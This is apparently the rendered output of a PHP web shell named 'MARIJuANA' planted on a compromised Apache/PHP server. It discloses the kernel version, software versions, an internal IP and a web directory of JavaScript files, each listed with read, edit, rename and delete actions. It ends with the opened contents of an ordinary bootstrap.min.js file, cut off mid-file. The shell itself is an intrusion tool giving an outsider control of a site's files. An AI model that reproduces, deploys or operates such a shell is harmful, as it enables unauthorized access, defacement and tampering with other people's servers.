MARIJuANA
— DIOS — NO — CREA — NADA — EN — VANO —
Linux instance-20230208-1745 6.8.0-1013-oracle #13~22.04.1-Ubuntu SMP Mon Sep 2 13:02:56 UTC 2024 x86_64
  SOFT : Apache/2.4.52 (Ubuntu) PHP : 8.1.2-1ubuntu2.19
/var/www/pocoes/transparencia/covide/js-files/
10.0.0.135

 
[ NAME ] [ SIZE ] [ PERM ] [ DATE ] [ ACT ]
+FILE +DIR
bootstrap-switch.js 8.258 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
bootstrap.min.js 27.17 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
custom.js 49.578 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
custom1.js 49.503 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
custom2.js 1.148 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
custom3.js 0.231 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery-1.7.2.min.js 92.619 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery-1.8.3.min.js 91.444 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery.ajaxchimp.min.js 2.313 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery.common.min.js 26.895 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery.countdown.js 23.802 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery.countdown_funcoes.js 1.205 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery.easing.1.3.js 7.907 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery.popupoverlay.js 28.46 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery.ui.touch-punch.min.js 1.172 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
jquery.vide.js 10.989 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
ticker.js 2.612 KB -rw-rw-r-- 2020-05-19 13:29 R E G D
REQUEST EXIT
/*! * Bootstrap v3.0.3 (http://getbootstrap.com) * Copyright 2013 Twitter, Inc. * Licensed under http://www.apache.org/licenses/LICENSE-2.0 */ if("undefined"==typeof jQuery)throw new Error("Bootstrap requires jQuery");+function(a){"use strict";function b(){var a=document.createElement("bootstrap"),b={WebkitTransition:"webkitTransitionEnd",MozTransition:"transitionend",OTransition:"oTransitionEnd otransitionend",transition:"transitionend"};for(var c in b)if(void 0!==a.style[c])return{end:b[c]}}a.fn.emulateTransitionEnd=function(b){var c=!1,d=this;a(this).one(a.support.transition.end,function(){c=!0});var e=function(){c||a(d).trigger(a.support.transition.end)};return setTimeout(e,b),this},a(function(){a.support.transition=b()})}(jQuery),+function(a){"use strict";var b='[data-dismiss="alert"]',c=function(c){a(c).on("click",b,this.close)};c.prototype.close=function(b){function c(){f.trigger("closed.bs.alert").remove()}var d=a(this),e=d.attr("data-target");e||(e=d.attr("href"),e=e&&e.replace(/.*(?=#[^\s]*$)/,""));var f=a(e);b&&b.preventDefault(),f.length||(f=d.hasClass("alert")?d:d.parent()),f.trigger(b=a.Event("close.bs.alert")),b.isDefaultPrevented()||(f.removeClass("in"),a.support.transition&&f.hasClass("fade")?f.one(a.support.transition.end,c).emulateTransitionEnd(150):c())};var d=a.fn.alert;a.fn.alert=function(b){return this.each(function(){var d=a(this),e=d.data("bs.alert");e||d.data("bs.alert",e=new c(this)),"string"==typeof b&&e[b].call(d)})},a.fn.alert.Constructor=c,a.fn.alert.noConflict=function(){return a.fn.alert=d,this},a(document).on("click.bs.alert.data-api",b,c.prototype.close)}(jQuery),+function(a){"use strict";var b=function(c,d){this.$element=a(c),this.options=a.extend({},b.DEFAULTS,d)};b.DEFAULTS={loadingText:"loading..."},b.prototype.setState=function(a){var b="disabled",c=this.$element,d=c.is("input")?"val":"html",e=c.data();a+="Text",e.resetText||c.data("resetText",c[d]()),c[d](e[a]||this.options[a]),setTimeout(function(){"loadingText"==a?c.addClass(b).attr(b,b):c.removeClass(b).removeAttr(b)},0)},b.prototype.toggle=function(){var a=this.$element.closest('[data-toggle="buttons"]'),b=!0;if(a.length){var c=this.$element.find("input");"radio"===c.prop("type")&&(c.prop("checked")&&this.$element.hasClass("active")?b=!1:a.find(".active").removeClass("active")),b&&c.prop("checked",!this.$element.hasClass("active")).trigger("change")}b&&this.$element.toggleClass("active")};var c=a.fn.button;a.fn.button=function(c){return this.each(function(){var d=a(this),e=d.data("bs.button"),f="object"==typeof c&&c;e||d.data("bs.button",e=new b(this,f)),"toggle"==c?e.toggle():c&&e.setState(c)})},a.fn.button.Constructor=b,a